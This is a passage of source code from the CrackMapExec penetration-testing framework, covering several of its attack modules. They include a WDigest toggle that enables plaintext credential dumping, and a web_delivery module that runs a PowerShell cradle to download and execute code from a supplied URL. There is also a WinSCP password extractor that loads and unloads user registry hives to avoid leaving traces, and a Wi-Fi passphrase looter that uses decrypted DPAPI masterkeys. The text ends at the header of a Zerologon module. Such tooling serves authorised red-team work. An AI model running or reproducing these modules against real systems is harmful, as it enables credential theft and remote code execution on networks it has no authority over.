def reg_query_value(self, dce, connection, keyName, valueName=None):
"""
Query remote registry data for a given registry value
"""
def subkey_values(subkey_handle):
dwIndex = 0
while True:
try:
value_type, value_name, value_data = get_value(subkey_handle, dwIndex)
yield (value_type, value_name, value_data)
dwIndex += 1
except DCERPCSessionError as e:
if e.error_code == ERROR_NO_MORE_ITEMS:
break
else:
self.context.log.error(f'HostChecker.reg_query_value()->sub_key_values(): Received error code {e.error_code}')
return
def get_value(subkey_handle, dwIndex=0):
ans = rrp.hBaseRegEnumValue(dce=dce, hKey=subkey_handle, dwIndex=dwIndex)
value_type = ans['lpType']
value_name = ans['lpValueNameOut']
value_data = ans['lpData']
# Do any conversion necessary depending on the registry value type
if value_type in (
REG_VALUE_TYPE_UNICODE_STRING,
REG_VALUE_TYPE_UNICODE_STRING_WITH_ENV,
REG_VALUE_TYPE_UNICODE_STRING_SEQUENCE):
value_data = b''.join(value_data).decode('utf-16')
else:
value_data = b''.join(value_data)
if value_type in (
REG_VALUE_TYPE_32BIT_LE,
REG_VALUE_TYPE_64BIT_LE):
value_data = int.from_bytes(value_data, 'little')
elif value_type == REG_VALUE_TYPE_32BIT_BE:
value_data = int.from_bytes(value_data, 'big')
return value_type, value_name[:-1], value_data
try:
root_key, subkey = keyName.split('\\', 1)
except ValueError:
self.context.log.error(f'HostChecker.reg_query_value(): Could not split keyname {keyName}')
return
ans = self._open_root_key(dce, connection, root_key)
if ans is None:
return ans
root_key_handle = ans['phKey']
try:
ans = rrp.hBaseRegOpenKey(dce, root_key_handle, subkey)
except DCERPCSessionError as e:
if e.error_code == ERROR_FILE_NOT_FOUND:
return e
subkey_handle = ans['phkResult']
if valueName is None:
_,_, data = get_value(subkey_handle)
else:
found = False
for _,name,data in subkey_values(subkey_handle):
if name.upper() == valueName.upper():
found = True
break
if not found:
return DCERPCSessionError(error_code=ERROR_OBJECT_NOT_FOUND)
return data
# Methods for getting values from SAMR and SCM #
################################################
def get_service(self, service_name, connection):
"""
Get the service status and configuration for specified service
"""
remoteOps = RemoteOperations(smbConnection=connection.conn, doKerberos=False)
machine_name,_ = remoteOps.getMachineNameAndDomain()
remoteOps._RemoteOperations__connectSvcCtl()
dce = remoteOps._RemoteOperations__scmr
scm_handle = scmr.hROpenSCManagerW(dce, machine_name)['lpScHandle']
service_handle = scmr.hROpenServiceW(dce, scm_handle, service_name)['lpServiceHandle']
service_config = scmr.hRQueryServiceConfigW(dce, service_handle)['lpServiceConfig']
service_status = scmr.hRQueryServiceStatus(dce, service_handle)['lpServiceStatus']['dwCurrentState']
remoteOps.finish()
return service_config, service_status
def get_user_info(self, connection, rid=501):
"""
Get user information for the user with the specified RID
"""
remoteOps = RemoteOperations(smbConnection=connection.conn, doKerberos=False)
machine_name, domain_name = remoteOps.getMachineNameAndDomain()
try:
remoteOps.connectSamr(machine_name)
except samr.DCERPCSessionError:
# If connecting to machine_name didn't work, it's probably because
# we're dealing with a domain controller, so we need to use the
# actual domain name instead of the machine name, because DCs don't
# use the SAM
remoteOps.connectSamr(domain_name)
dce = remoteOps._RemoteOperations__samr
domain_handle = remoteOps._RemoteOperations__domainHandle
user_handle = samr.hSamrOpenUser(dce, domain_handle, userId=rid)['UserHandle']
user_info = samr.hSamrQueryInformationUser2(dce, user_handle, samr.USER_INFORMATION_CLASS.UserAllInformation)
user_info = user_info['Buffer']['All']
remoteOps.finish()
return user_info
def ls(self, smb, path='\\', share='C$'):
l = []
try:
l = smb.conn.listPath(share, path)
except SMBSessionError as e:
if e.getErrorString()[0] not in ('STATUS_NO_SUCH_FILE', 'STATUS_OBJECT_NAME_NOT_FOUND'):
self.context.log.error(f'ls(): C:\\{path} {e.getErrorString()}')
except Exception as e:
self.context.log.error(f'ls(): C:\\{path} {e}\n')
return l
# Comparison operators #
########################
def le(reg_sz_string, number):
return int(reg_sz_string[:-1]) <= number
def in_(obj, seq):
return obj in seq
def startswith(string, start):
return string.startswith(start)
def not_(boolean_operator):
def wrapper(*args, **kwargs):
return not boolean_operator(*args, **kwargs)
wrapper.__name__ = f'not_{boolean_operator.__name__}'
return wrapper
================================================
FILE: cme/modules/wdigest.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations
from sys import exit
class CMEModule:
name = "wdigest"
description = "Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
"""
ACTION Create/Delete the registry key (choices: enable, disable, check)
"""
if not "ACTION" in module_options:
context.log.fail("ACTION option not specified!")
exit(1)
if module_options["ACTION"].lower() not in ["enable", "disable", "check"]:
context.log.fail("Invalid value for ACTION option!")
exit(1)
self.action = module_options["ACTION"].lower()
def on_admin_login(self, context, connection):
if self.action == "enable":
self.wdigest_enable(context, connection.conn)
elif self.action == "disable":
self.wdigest_disable(context, connection.conn)
elif self.action == "check":
self.wdigest_check(context, connection.conn)
def wdigest_enable(self, context, smbconnection):
remoteOps = RemoteOperations(smbconnection, False)
remoteOps.enableRegistry()
if remoteOps._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp,
regHandle,
"SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest",
)
keyHandle = ans["phkResult"]
rrp.hBaseRegSetValue(
remoteOps._RemoteOperations__rrp,
keyHandle,
"UseLogonCredential\x00",
rrp.REG_DWORD,
1,
)
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "UseLogonCredential\x00")
if int(data) == 1:
context.log.success("UseLogonCredential registry key created successfully")
try:
remoteOps.finish()
except:
pass
def wdigest_disable(self, context, smbconnection):
remoteOps = RemoteOperations(smbconnection, False)
remoteOps.enableRegistry()
if remoteOps._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp,
regHandle,
"SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest",
)
keyHandle = ans["phkResult"]
try:
rrp.hBaseRegDeleteValue(
remoteOps._RemoteOperations__rrp,
keyHandle,
"UseLogonCredential\x00",
)
except:
context.log.success("UseLogonCredential registry key not present")
try:
remoteOps.finish()
except:
pass
return
try:
# Check to make sure the reg key is actually deleted
rtype, data = rrp.hBaseRegQueryValue(
remoteOps._RemoteOperations__rrp,
keyHandle,
"UseLogonCredential\x00",
)
except DCERPCException:
context.log.success("UseLogonCredential registry key deleted successfully")
try:
remoteOps.finish()
except:
pass
def wdigest_check(self, context, smbconnection):
remoteOps = RemoteOperations(smbconnection, False)
remoteOps.enableRegistry()
if remoteOps._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, "SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest")
keyHandle = ans["phkResult"]
try:
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "UseLogonCredential\x00")
if int(data) == 1:
context.log.success("UseLogonCredential registry key is enabled")
else:
context.log.fail("Unexpected registry value for UseLogonCredential: %s" % data)
except DCERPCException as d:
if "winreg.HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest" in str(d):
context.log.fail("UseLogonCredential registry key is disabled (registry key not found)")
else:
context.log.fail("UseLogonCredential registry key not present")
try:
remoteOps.finish()
except:
pass
================================================
FILE: cme/modules/web_delivery.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from sys import exit
class CMEModule:
"""
Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
Reference: https://github.com/EmpireProject/Empire/blob/2.0_beta/data/module_source/code_execution/Invoke-MetasploitPayload.ps1
Module by @byt3bl33d3r
"""
name = "web_delivery"
description = "Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module"
supported_protocols = ["smb", "mssql"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
"""
URL URL for the download cradle
PAYLOAD Payload architecture (choices: 64 or 32) Default: 64
"""
if not "URL" in module_options:
context.log.fail("URL option is required!")
exit(1)
self.url = module_options["URL"]
self.payload = "64"
if "PAYLOAD" in module_options:
if module_options["PAYLOAD"] not in ["64", "32"]:
context.log.fail("Invalid value for PAYLOAD option!")
exit(1)
self.payload = module_options["PAYLOAD"]
def on_admin_login(self, context, connection):
ps_command = """[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('{}');""".format(self.url)
if self.payload == "32":
connection.ps_execute(ps_command, force_ps32=True)
else:
connection.ps_execute(ps_command, force_ps32=False)
context.log.success("Executed web-delivery launcher")
================================================
FILE: cme/modules/webdav.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cme.protocols.smb.remotefile import RemoteFile
from impacket import nt_errors
from impacket.smb3structs import FILE_READ_DATA
from impacket.smbconnection import SessionError
class CMEModule:
"""
Enumerate whether the WebClient service is running on the target by looking for the
DAV RPC Service pipe. This technique was first suggested by Lee Christensen (@tifkin_)
Module by Tobias Neitzel (@qtc_de)
"""
name = "webdav"
description = "Checks whether the WebClient service is running on the target"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
"""
MSG Info message when the WebClient service is running. '{}' is replaced by the target.
"""
self.output = "WebClient Service enabled on: {}"
if "MSG" in module_options:
self.output = module_options["MSG"]
def on_login(self, context, connection):
"""
Check whether the 'DAV RPC Service' pipe exists within the 'IPC$' share. This indicates
that the WebClient service is running on the target.
"""
try:
remote_file = RemoteFile(connection.conn, "DAV RPC Service", "IPC$", access=FILE_READ_DATA)
remote_file.open()
remote_file.close()
context.log.highlight(self.output.format(connection.conn.getRemoteHost()))
except SessionError as e:
if e.getErrorCode() == nt_errors.STATUS_OBJECT_NAME_NOT_FOUND:
pass
else:
raise e
================================================
FILE: cme/modules/whoami.py
================================================
class CMEModule:
"""
Basic enumeration of provided user information and privileges
Module by spyr0 (@spyr0-sec)
"""
name = "whoami"
description = "Get details of provided user"
supported_protocols = ["ldap"]
opsec_safe = True # Does the module touch disk?
multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?
def options(self, context, module_options):
"""
USER Enumerate information about a different SamAccountName
"""
self.username = None
if "USER" in module_options:
self.username = module_options["USER"]
def on_login(self, context, connection):
searchBase = connection.ldapConnection._baseDN
if self.username is None:
searchFilter = f"(sAMAccountName={connection.username})"
else:
searchFilter = f"(sAMAccountName={format(self.username)})"
context.log.debug(f"Using naming context: {searchBase} and {searchFilter} as search filter")
# Get attributes of provided user
r = connection.ldapConnection.search(
searchBase=searchBase,
searchFilter=searchFilter,
attributes=[
"name",
"sAmAccountName",
"description",
"distinguishedName",
"pwdLastSet",
"logonCount",
"lastLogon",
"userAccountControl",
"servicePrincipalName",
"memberOf",
],
sizeLimit=999,
)
for response in r[0]["attributes"]:
if "userAccountControl" in str(response["type"]):
if str(response["vals"][0]) == "512":
context.log.highlight(f"Enabled: Yes")
context.log.highlight(f"Password Never Expires: No")
elif str(response["vals"][0]) == "514":
context.log.highlight(f"Enabled: No")
context.log.highlight(f"Password Never Expires: No")
elif str(response["vals"][0]) == "66048":
context.log.highlight(f"Enabled: Yes")
context.log.highlight(f"Password Never Expires: Yes")
elif str(response["vals"][0]) == "66050":
context.log.highlight(f"Enabled: No")
context.log.highlight(f"Password Never Expires: Yes")
elif "lastLogon" in str(response["type"]):
if str(response["vals"][0]) == "1601":
context.log.highlight(f"Last logon: Never")
else:
context.log.highlight(f"Last logon: {response['vals'][0]}")
elif "memberOf" in str(response["type"]):
for group in response["vals"]:
context.log.highlight(f"Member of: {group}")
elif "servicePrincipalName" in str(response["type"]):
context.log.highlight(f"Service Account Name(s) found - Potentially Kerberoastable user!")
for spn in response["vals"]:
context.log.highlight(f"Service Account Name: {spn}")
else:
context.log.highlight(response["type"] + ": " + response["vals"][0])
================================================
FILE: cme/modules/winscp_dump.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# If you are looking for a local Version, the baseline code is from https://github.com/NeffIsBack/WinSCPPasswdExtractor
# References and inspiration:
# - https://github.com/anoopengineer/winscppasswd
# - https://github.com/dzxs/winscppassword
# - https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/parser/winscp.rb
import traceback
from typing import Tuple
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations
from urllib.parse import unquote
from io import BytesIO
import re
import configparser
class CMEModule:
"""
Module by @NeffIsBack
"""
name = "winscp"
description = "Looks for WinSCP.ini files in the registry and default locations and tries to extract credentials."
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
"""
PATH Specify the Path if you already found a WinSCP.ini file. (Example: PATH="C:\\Users\\USERNAME\\Documents\\WinSCP_Passwords\\WinSCP.ini")
REQUIRES ADMIN PRIVILEGES:
As Default the script looks into the registry and searches for WinSCP.ini files in
\"C:\\Users\\{USERNAME}\\Documents\\WinSCP.ini\" and in
\"C:\\Users\\{USERNAME}\\AppData\\Roaming\\WinSCP.ini\",
for every user found on the System.
"""
if "PATH" in module_options:
self.filepath = module_options["PATH"]
else:
self.filepath = ""
self.PW_MAGIC = 0xA3
self.PW_FLAG = 0xFF
self.share = "C$"
self.userDict = {}
# ==================== Helper ====================
def printCreds(self, context, session):
if type(session) is str:
context.log.fail(session)
else:
context.log.highlight("======={s}=======".format(s=session[0]))
context.log.highlight("HostName: {s}".format(s=session[1]))
context.log.highlight("UserName: {s}".format(s=session[2]))
context.log.highlight("Password: {s}".format(s=session[3]))
def userObjectToNameMapper(self, context, connection, allUserObjects):
try:
remoteOps = RemoteOperations(connection.conn, False)
remoteOps.enableRegistry()
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans["phKey"]
for userObject in allUserObjects:
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp,
regHandle,
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\" + userObject,
)
keyHandle = ans["phkResult"]
userProfilePath = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "ProfileImagePath")[1].split("\x00")[:-1][0]
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
self.userDict[userObject] = userProfilePath.split("\\")[-1]
finally:
remoteOps.finish()
# ==================== Decrypt Password ====================
def decryptPasswd(self, host: str, username: str, password: str) -> str:
key = username + host
# transform password to bytes
passBytes = []
for i in range(len(password)):
val = int(password[i], 16)
passBytes.append(val)
pwFlag, passBytes = self.dec_next_char(passBytes)
pwLength = 0
# extract password length and trim the passbytes
if pwFlag == self.PW_FLAG:
_, passBytes = self.dec_next_char(passBytes)
pwLength, passBytes = self.dec_next_char(passBytes)
else:
pwLength = pwFlag
to_be_deleted, passBytes = self.dec_next_char(passBytes)
passBytes = passBytes[to_be_deleted * 2 :]
# decrypt the password
clearpass = ""
for i in range(pwLength):
val, passBytes = self.dec_next_char(passBytes)
clearpass += chr(val)
if pwFlag == self.PW_FLAG:
clearpass = clearpass[len(key) :]
return clearpass
def dec_next_char(self, passBytes) -> "Tuple[int, bytes]":
"""
Decrypts the first byte of the password and returns the decrypted byte and the remaining bytes.
Parameters
----------
passBytes : bytes
The password bytes
"""
if not passBytes:
return 0, passBytes
a = passBytes[0]
b = passBytes[1]
passBytes = passBytes[2:]
return ~(((a << 4) + b) ^ self.PW_MAGIC) & 0xFF, passBytes
# ==================== Handle Registry ====================
def registrySessionExtractor(self, context, connection, userObject, sessionName):
"""
Extract Session information from registry
"""
try:
remoteOps = RemoteOperations(connection.conn, False)
remoteOps.enableRegistry()
ans = rrp.hOpenUsers(remoteOps._RemoteOperations__rrp)
regHandle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp,
regHandle,
userObject + "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions\\" + sessionName,
)
keyHandle = ans["phkResult"]
hostName = unquote(rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "HostName")[1].split("\x00")[:-1][0])
userName = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "UserName")[1].split("\x00")[:-1][0]
try:
password = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "Password")[1].split("\x00")[:-1][0]
except:
context.log.debug("Session found but no Password is stored!")
password = ""
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
if password:
decPassword = self.decryptPasswd(hostName, userName, password)
else:
decPassword = "NO_PASSWORD_FOUND"
sectionName = unquote(sessionName)
return [sectionName, hostName, userName, decPassword]
except Exception as e:
context.log.fail(f"Error in Session Extraction: {e}")
context.log.debug(traceback.format_exc())
finally:
remoteOps.finish()
return "ERROR IN SESSION EXTRACTION"
def findAllLoggedInUsersInRegistry(self, context, connection):
"""
Checks whether User already exist in registry and therefore are logged in
"""
userObjects = []
try:
remoteOps = RemoteOperations(connection.conn, False)
remoteOps.enableRegistry()
# Enumerate all logged in and loaded Users on System
ans = rrp.hOpenUsers(remoteOps._RemoteOperations__rrp)
regHandle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, "")
keyHandle = ans["phkResult"]
data = rrp.hBaseRegQueryInfoKey(remoteOps._RemoteOperations__rrp, keyHandle)
users = data["lpcSubKeys"]
# Get User Names
userNames = []
for i in range(users):
userNames.append(rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, keyHandle, i)["lpNameOut"].split("\x00")[:-1][0])
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
# Filter legit users in regex
userNames.remove(".DEFAULT")
regex = re.compile(r"^.*_Classes$")
userObjects = [i for i in userNames if not regex.match(i)]
except Exception as e:
context.log.fail(f"Error handling Users in registry: {e}")
context.log.debug(traceback.format_exc())
finally:
remoteOps.finish()
return userObjects
def findAllUsers(self, context, connection):
"""
Find all User on the System in HKEY_LOCAL_MACHINE
"""
userObjects = []
try:
remoteOps = RemoteOperations(connection.conn, False)
remoteOps.enableRegistry()
# Enumerate all Users on System
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp,
regHandle,
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList",
)
keyHandle = ans["phkResult"]
data = rrp.hBaseRegQueryInfoKey(remoteOps._RemoteOperations__rrp, keyHandle)
users = data["lpcSubKeys"]
# Get User Names
for i in range(users):
userObjects.append(rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, keyHandle, i)["lpNameOut"].split("\x00")[:-1][0])
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
except Exception as e:
context.log.fail(f"Error handling Users in registry: {e}")
context.log.debug(traceback.format_exc())
finally:
remoteOps.finish()
return userObjects
def loadMissingUsers(self, context, connection, unloadedUserObjects):
"""
Extract Information for not logged in Users and then loads them into registry.
"""
try:
remoteOps = RemoteOperations(connection.conn, False)
remoteOps.enableRegistry()
for userObject in unloadedUserObjects:
# Extract profile Path of NTUSER.DAT
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp,
regHandle,
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\" + userObject,
)
keyHandle = ans["phkResult"]
userProfilePath = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "ProfileImagePath")[1].split("\x00")[:-1][0]
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
# Load Profile
ans = rrp.hOpenUsers(remoteOps._RemoteOperations__rrp)
regHandle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, "")
keyHandle = ans["phkResult"]
context.log.debug("LOAD USER INTO REGISTRY: " + userObject)
rrp.hBaseRegLoadKey(
remoteOps._RemoteOperations__rrp,
keyHandle,
userObject,
userProfilePath + "\\" + "NTUSER.DAT",
)
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
finally:
remoteOps.finish()
def unloadMissingUsers(self, context, connection, unloadedUserObjects):
"""
If some User were not logged in at the beginning we unload them from registry. Don't leave clues behind...
"""
try:
remoteOps = RemoteOperations(connection.conn, False)
remoteOps.enableRegistry()
# Unload Profile
ans = rrp.hOpenUsers(remoteOps._RemoteOperations__rrp)
regHandle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, "")
keyHandle = ans["phkResult"]
for userObject in unloadedUserObjects:
context.log.debug("UNLOAD USER FROM REGISTRY: " + userObject)
try:
rrp.hBaseRegUnLoadKey(remoteOps._RemoteOperations__rrp, keyHandle, userObject)
except Exception as e:
context.log.fail(f"Error unloading user {userObject} in registry: {e}")
context.log.debug(traceback.format_exc())
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
finally:
remoteOps.finish()
def checkMasterpasswordSet(self, connection, userObject):
try:
remoteOps = RemoteOperations(connection.conn, False)
remoteOps.enableRegistry()
ans = rrp.hOpenUsers(remoteOps._RemoteOperations__rrp)
regHandle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp,
regHandle,
userObject + "\\Software\\Martin Prikryl\\WinSCP 2\\Configuration\\Security",
)
keyHandle = ans["phkResult"]
useMasterPassword = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "UseMasterPassword")[1]
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
finally:
remoteOps.finish()
return useMasterPassword
def registryDiscover(self, context, connection):
context.log.display("Looking for WinSCP creds in Registry...")
try:
remoteOps = RemoteOperations(connection.conn, False)
remoteOps.enableRegistry()
# Enumerate all Users on System
userObjects = self.findAllLoggedInUsersInRegistry(context, connection)
allUserObjects = self.findAllUsers(context, connection)
self.userObjectToNameMapper(context, connection, allUserObjects)
# Users which must be loaded into registry:
unloadedUserObjects = list(set(userObjects).symmetric_difference(set(allUserObjects)))
self.loadMissingUsers(context, connection, unloadedUserObjects)
# Retrieve how many sessions are stored in registry from each UserObject
ans = rrp.hOpenUsers(remoteOps._RemoteOperations__rrp)
regHandle = ans["phKey"]
for userObject in allUserObjects:
try:
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp,
regHandle,
userObject + "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions",
)
keyHandle = ans["phkResult"]
data = rrp.hBaseRegQueryInfoKey(remoteOps._RemoteOperations__rrp, keyHandle)
sessions = data["lpcSubKeys"]
context.log.success('Found {} sessions for user "{}" in registry!'.format(sessions - 1, self.userDict[userObject]))
# Get Session Names
sessionNames = []
for i in range(sessions):
sessionNames.append(rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, keyHandle, i)["lpNameOut"].split("\x00")[:-1][0])
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
sessionNames.remove("Default%20Settings")
if self.checkMasterpasswordSet(connection, userObject):
context.log.fail("MasterPassword set! Aborting extraction...")
continue
# Extract stored Session infos
for sessionName in sessionNames:
self.printCreds(
context,
self.registrySessionExtractor(context, connection, userObject, sessionName),
)
except DCERPCException as e:
if str(e).find("ERROR_FILE_NOT_FOUND"):
context.log.debug("No WinSCP config found in registry for user {}".format(userObject))
except Exception as e:
context.log.fail(f"Unexpected error: {e}")
context.log.debug(traceback.format_exc())
self.unloadMissingUsers(context, connection, unloadedUserObjects)
except DCERPCException as e:
# Error during registry query
if str(e).find("rpc_s_access_denied"):
context.log.fail("Error: rpc_s_access_denied. Seems like you don't have enough privileges to read the registry.")
except Exception as e:
context.log.fail(f"UNEXPECTED ERROR: {e}")
context.log.debug(traceback.format_exc())
finally:
remoteOps.finish()
# ==================== Handle Configs ====================
def decodeConfigFile(self, context, confFile):
config = configparser.RawConfigParser(strict=False)
config.read_string(confFile)
# Stop extracting creds if Master Password is set
if int(config.get("Configuration\\Security", "UseMasterPassword")) == 1:
context.log.fail("Master Password Set, unable to recover saved passwords!")
return
for section in config.sections():
if config.has_option(section, "HostName"):
hostName = unquote(config.get(section, "HostName"))
userName = config.get(section, "UserName")
if config.has_option(section, "Password"):
encPassword = config.get(section, "Password")
decPassword = self.decryptPasswd(hostName, userName, encPassword)
else:
decPassword = "NO_PASSWORD_FOUND"
sectionName = unquote(section)
self.printCreds(context, [sectionName, hostName, userName, decPassword])
def getConfigFile(self, context, connection):
if self.filepath:
self.share = self.filepath.split(":")[0] + "$"
path = self.filepath.split(":")[1]
try:
buf = BytesIO()
connection.conn.getFile(self.share, path, buf.write)
confFile = buf.getvalue().decode()
context.log.success("Found config file! Extracting credentials...")
self.decodeConfigFile(context, confFile)
except:
context.log.fail("Error! No config file found at {}".format(self.filepath))
context.log.debug(traceback.format_exc())
else:
context.log.display("Looking for WinSCP creds in User documents and AppData...")
output = connection.execute('powershell.exe "Get-LocalUser | Select name"', True)
users = []
for row in output.split("\r\n"):
users.append(row.strip())
users = users[2:]
# Iterate over found users and default paths to look for WinSCP.ini files
for user in users:
paths = [
("\\Users\\" + user + "\\Documents\\WinSCP.ini"),
("\\Users\\" + user + "\\AppData\\Roaming\\WinSCP.ini"),
]
for path in paths:
confFile = ""
try:
buf = BytesIO()
connection.conn.getFile(self.share, path, buf.write)
confFile = buf.getvalue().decode()
context.log.success('Found config file at "{}"! Extracting credentials...'.format(self.share + path))
except:
context.log.debug('No config file found at "{}"'.format(self.share + path))
if confFile:
self.decodeConfigFile(context, confFile)
def on_admin_login(self, context, connection):
if not self.filepath:
self.registryDiscover(context, connection)
self.getConfigFile(context, connection)
================================================
FILE: cme/modules/wireless.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from dploot.triage.masterkeys import MasterkeysTriage
from dploot.lib.target import Target
from dploot.lib.smb import DPLootSMBConnection
from dploot.triage.wifi import WifiTriage
from cme.helpers.logger import highlight
class CMEModule:
name = "wifi"
description = "Get key of all wireless interfaces"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
""" """
def on_admin_login(self, context, connection):
host = connection.hostname + "." + connection.domain
domain = connection.domain
username = connection.username
kerberos = connection.kerberos
aesKey = connection.aesKey
use_kcache = getattr(connection, "use_kcache", False)
password = getattr(connection, "password", "")
lmhash = getattr(connection, "lmhash", "")
nthash = getattr(connection, "nthash", "")
target = Target.create(
domain=domain,
username=username,
password=password,
target=host,
lmhash=lmhash,
nthash=nthash,
do_kerberos=kerberos,
aesKey=aesKey,
no_pass=True,
use_kcache=use_kcache,
)
conn = None
try:
conn = DPLootSMBConnection(target)
conn.smb_session = connection.conn
except Exception as e:
context.log.debug("Could not upgrade connection: {}".format(e))
return
masterkeys = []
try:
masterkeys_triage = MasterkeysTriage(target=target, conn=conn)
masterkeys += masterkeys_triage.triage_system_masterkeys()
except Exception as e:
context.log.debug("Could not get masterkeys: {}".format(e))
if len(masterkeys) == 0:
context.log.fail("No masterkeys looted")
return
context.log.success("Got {} decrypted masterkeys. Looting Wifi interfaces".format(highlight(len(masterkeys))))
try:
# Collect Chrome Based Browser stored secrets
wifi_triage = WifiTriage(target=target, conn=conn, masterkeys=masterkeys)
wifi_creds = wifi_triage.triage_wifi()
except Exception as e:
context.log.debug("Error while looting wifi: {}".format(e))
for wifi_cred in wifi_creds:
if wifi_cred.auth.upper() == "OPEN":
context.log.highlight("[OPEN] %s" % (wifi_cred.ssid))
elif wifi_cred.auth.upper() in ["WPAPSK", "WPA2PSK", "WPA3SAE"]:
try:
context.log.highlight(
"[%s] %s - Passphrase: %s"
% (
wifi_cred.auth.upper(),
wifi_cred.ssid,
wifi_cred.password.decode("latin-1"),
)
)
except:
context.log.highlight("[%s] %s - Passphrase: %s" % (wifi_cred.auth.upper(), wifi_cred.ssid, wifi_cred.password))
elif wifi_cred.auth.upper() in ['WPA', 'WPA2']:
try:
if self.eap_username is not None and self.eap_password is not None:
context.log.highlight(
"[%s] %s - %s - Identifier: %s:%s"
% (
wifi_cred.auth.upper(),
wifi_cred.ssid,
wifi_cred.eap_type,
wifi_cred.eap_username,
wifi_cred.eap_password,
)
)
else:
context.log.highlight(
"[%s] %s - %s "
% (
wifi_cred.auth.upper(),
wifi_cred.ssid,
wifi_cred.eap_type,
)
)
except:
context.log.highlight("[%s] %s - Passphrase: %s" % (wifi_cred.auth.upper(), wifi_cred.ssid, wifi_cred.password))
else:
context.log.highlight("[WPA-EAP] %s - %s" % (wifi_cred.ssid, wifi_cred.eap_type))
================================================
FILE: cme/modules/zerologon.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# everything is comming from https://github.com/dirkjanm/CVE-2020-1472
# credit to @dirkjanm
# module by : @mpgn_x64
